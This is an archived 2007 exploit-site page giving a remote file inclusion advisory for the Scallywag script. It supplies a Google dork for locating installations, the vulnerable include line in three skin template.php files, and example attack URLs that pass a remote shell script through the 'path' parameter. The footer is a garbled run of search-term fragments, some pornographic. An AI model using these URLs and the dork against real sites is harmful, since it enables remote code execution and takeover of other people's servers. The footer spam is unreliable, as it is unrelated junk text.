about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Scallywag (template.php path) Remote File Inclusion Vulnerabilities



2007-05-23 Scallywag (template.php path) Remote File Inclusion Vulnerabilities
Rated as : Moderate Risk

##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                    
                     #
#                                                                         
                  # 
#Dork:"Powered by Scallywag"                                    
                            #
#                                                                         
                  #
#                                                                         
                  # 
##############################################################################################
#Vuln Code                                                                
                  #  
#                                                                         
                  # 
#ERROR1:skin/dark/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG1:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################

#                                                                         
                  # 
#ERROR2:skin/gold/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG2:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################
#                                                                         
                  # 
#ERROR3:skin/original/template.php                                        
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     #
#                                                                         
                  # 
#                                                                         
                  # 
#BUG3:                                                                    
                  # 
#                                                                         
                  # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL
Script]]           #
##############################################################################################
#                                                                         
                  # 
#Script Download                                                          
                  # 
##############################################################################################
#                                                                         
                  # 
#http://www.woweb.ru/load/82-1-0-3791                                     
                  # 
#                                                                         
                  # 
##############################################################################################

#                                                                         
                  # 
#Cyber-Security                                                           
                  # 
#                                                                         
                  # 
##############################################################################################
##############################################################################################
securitydot.net - 2007-05-23

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 06:36:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Ashanti Jalandhar www.78yw.c pinaysexsc irani gril xxx sxe a...oolbar Images of news for c iransex php 3.23 mambo Remo girlstv www.lankag www.ynzql. 200 /compo DMX Www.kavyam gnutella kom yabb/image news for c freesexy p hjg www.heng10 shamrock TRISHASEX. php-nuke 2 OpenBSD 3. WWW.DesiBa Dis cerber vs FTPd shahvatsar yslzdp.com OTHRS www.sex in www pakist game.vsie. icewarp we news for c www.fwgchi aid1 download s IPD www.fwgchi sexy girl ayshvaran. www.sex.mo all cartoo